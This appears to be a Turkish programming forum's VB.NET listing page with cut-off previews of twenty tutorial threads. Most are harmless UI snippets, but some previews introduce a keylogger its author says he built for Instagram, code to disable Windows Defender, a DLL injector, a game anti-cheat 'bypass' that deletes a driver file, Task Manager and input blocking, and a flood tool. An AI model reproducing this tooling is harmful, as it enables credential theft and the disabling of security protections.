vbnet

 1. N

  [Vb.net] Cd room açıcı

  Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >=1 then For i=0 to colCDROMs.COunt -1 colCDROMs.Item(i).Eject Next ' cdrom End If Bu kodları not defterine yapıştırın .vbs olarak kaydedin programa tıkladığınızda cd room açılır
 2. Drenated

  VB.NET | Görev Yöneticisi Engelleme

  Merhabalar Arkadaşlar. Bu Konumda Sizlere Vb.net Dili Üzerinden Görev Yöneticisi Engellemeyi Göstericem. Öncelikle Bir Form Application Yaratalım Ve İçerisine Başlat Ve Durdur Diye 2 Tane Button Koyalım Fakat Bundan Önce Programımızı Yönetici Olarak Başlamaya Ayarlamamız Lazım Bunun İçin Şurada...
 3. Drenated

  VB.NET | MD5 Şifreleme

  Public Function MD5(ByVal yazi As String) As String Try Dim MD5şifreleyici As New System.Security.Cryptography.MD5CryptoServiceProvider Dim baytlar As Byte() = System.Text.ASCIIEncoding.ASCII.GetBytes(yazi) Dim hash As Byte() = MD5şifreleyici.ComputeHash(baytlar) Dim kapasite As Integer =...
 4. Drenated

  VB.NET | Form ' a açılış efekti verme

  Gerekli olanlar: 1 adet timerTimer'ın interval olayını 100 yapın. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load Timer1.Start() Timer1.interval=100 End Sub Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs)...
 5. Drenated

  VB.NET | Klavye ve Mouse'u Devredışı Bırakmak

  Visual Basic kullanarak PC'ye girişleri devre dışı bırakabiliriz. Forma 1'er adet Timer ve Command ekliyoruz. Option Explicit Private Declare Function BlockInput Lib "user32" (ByVal fBlock _ As Long ) As Long Const API_FALSE = 0& Const API_TRUE = 1& Private Sub Command1_Click( )...
 6. Drenated

  VB.NET Kendi Uygulamanıza Giriş-Kayıt Sistemi Ekleme

  Giriş Ekranına Şunları Ekleyerek Başlayın; 2 Tane Label 2 Tane Buton 2 Tane TextBox Ekleyin... Formumuza şu kütüphaneleri ekleyin; Imports System.Net Imports System.IO Ardından şu değişkenleri tanıtın; Dim wc As New Net.WebClient Dim texting = wc.DownloadString("http...
 7. 1Jeff

  [VB.NET] Gelişmiş Flood Programı

  Program saat 11:43'te bitirilmiştir ! Kodlayan Kişi : Jeff Drenated Kodlama Dili : Visual Basic .NET Kodlamak Kaç Dakika Aldı : 20 Dakika Programın Amacı : Yok, canım sıkıldığı için yaptım. Programın Kullanımı : Programda Verilmiştir. Programdan Görüntüler : - - Programda Tema...
 8. Drenated

  VB.NET | Tuşla formu gizliyip tekrar gösterme

  Öncelikle public classımızın altına şu kodu ekliyoruz: Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short 1 - 1 Tane label ve Timer ekliyoruz Interval "1" Enablesini true yapıyoruz. çift tıklayıp şu kodu giriyoruz. If GetAsyncKeyState(Keys.Insert) =...
 9. Drenated

  VB.NET | Yazıdaki kelimeleri bulma ve yerlerini değiştirmek

  Dim paren As String = "<figure(.*?)</figure>" Dim command As String = inout Dim matchess As MatchCollection = Regex.Matches(command, paren) Dim rumble As Integer rumble = 0 For Each m In matchess Dim temp As String = "match = " + m.ToString()...
 10. Drenated

  VB.NET | Dostlarınıza Virüs Şakası Yapma

  Private Sub Timer1_Elapsed(ByVal sender As Object, ByVal e As System.Timers.ElapsedEventArgs) Handles Timer1.Elapsed If ProgressBar1.Value > 20 Then ProgressBar1.Value = ProgressBar1.Value - 10 Else Timer1.Enabled = False MsgBox("AHA!!!"...
 11. 1Jeff

  [VB.NET] Bypass Kodlamak ?

  Bilginize : Kodlar Full Xspirit.sys Dosyasını Siler ! Bypass Kod 2 Şekilde Kodlanır 1-)Timer Yapıp Enabled Bölümünü True Yazıp İçine Şu Kodları Yazarak Oto Aktif Oluyor Bypass Şöyle : Try Dim folderPath As String = Environment.GetFolderPath(SpecialFolder.Windows)...
 12. 1Jeff

  [DEV] Defender Açma Ve Kapatma Kodları !

  Arkadaşlar ben bu kodu çok aradım internetde ama bulamadım ve kendim yapmaya karar verdim. Her neyse kodları vereyim hemen :D DİKKAT VİSUAL STUDİO'YU YÖNETİCİK OLARAK ÇALIŞTIRIP YAPIN VE YAPTIGINIZI PROGRAMI YÖNETİCİ OLARAK ÇALIŞTIRIRSANIZ ÇALIŞIR ANCAK!! Windows 7/8/8.1 En üste gelecek kod...
 13. 1Jeff

  [VB.NET] Form Başlığını Kaydırma

  Bugün Sizlere Visual Studio'da Form Başlığını Kayan Yazı Efekti Verme Kodlarını Göstereceğim. Gerekli Malzemeler : Kod: 1 Adet Timer Şimdi Form'a Çift Tıklayınız Her Şeyi Siliniz Verceğim Kodları Yapıştırınız Public Class Form1 Public sayac As Integer = 0 Public başlık As String = ""...
 14. 1Jeff

  [VB.NET] HWID Oluşturma !

  Keklerinize ekleyebileceğiniz mükemmel bir kod vereceğim. Bu kod sayesinde herhangi birisinin HWID'ini onaylayıp kekinizi kullanmanıza izin verebilirsiniz. Bu kodu nasıl onaylarım derseniz ister Facebook'da post altına , ister WebSite'nizde onaylayabilirsiniz. Dilerseniz veya eğer yardım...
 15. HZ.CİN

  Visual Studio Keylogger Yapımı

  Selamlar Ben Editör Cin Bugün Sizlere Ufak Çaplı Bir Keylogger Yapımı Göstereceğim Size Ufak Bir Çalışmamı Göstereyim Ben Instagram İçin Yaptım Siz Dilediğiniz Gibi Yapın KODLAR: \/ Imports System.Net.Mail Public Class Form1 Private Sub Button1_Click(sender As Object, e As EventArgs)...
 16. 1Jeff

  DLL Injector Kodlama !

  Bugün sizlere Vb.net ile DLL İnjector yapımını gösterecegim Form'a Eklenicek İtemler * 2 Textbox * 1 Button * 1 Timer * 1 OpenFileDialog * 1 Label Ekliyoruz. İlk Olarak; Formun Load Kısmına Girilecek Kod; button1.text = "Dll Bul" label1.text = "Dosyalar Aranıyor..." timer1.interval = 50...
 17. 1Jeff

  VB.NET | Hacker Simulator

  Programı sıkılınca yapmıştım ve paylaşma gereği duydum aşağıda programın ekran görüntüleri ve indirme linki vardır. Programın Kodlama Dili : Visual Basic .NET Programı Kodlayan Kişi : Jeff Dosya.TC : https://s2.dosya.tc/server12/dvbxdp/Hacker_Simulator.exe.html VirüsTotal ...
 18. 1Jeff

  VB.NET | Kendi Popup Menüyü TextBoxta Gösterme

  If Button = 2 Then With Text1 .Enabled = False PopupMenu {KendiMenunuz} .Enabled = True .SetFocus End With End If End Sub
 19. 1Jeff

  VB.NET | Mouse Pointer Saklama

  Bu is için ShowCursor API'si kullanilir. Asagidaki kodu bir module içine yaz: Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long Bu kod mouse imlecini saklar: FareImleci = ShowCursor(False) Bu kod mouse imlecini görünür hale getirir: FareImleci = ShowCursor(True)
 20. 1Jeff

  VB.NET | Dikine Uzanan Label

  Private Sub Form_Activate() Dim s As String Label1.Caption = "Visual Basic 2000" For i = 1 To Len(Label1) s = s & Mid$(Label1, i, 1) & vbCrLf Next Label1 = s End Sub dikkat: Label'i dikine çekmelisiniz

Theme editor

Top Bottom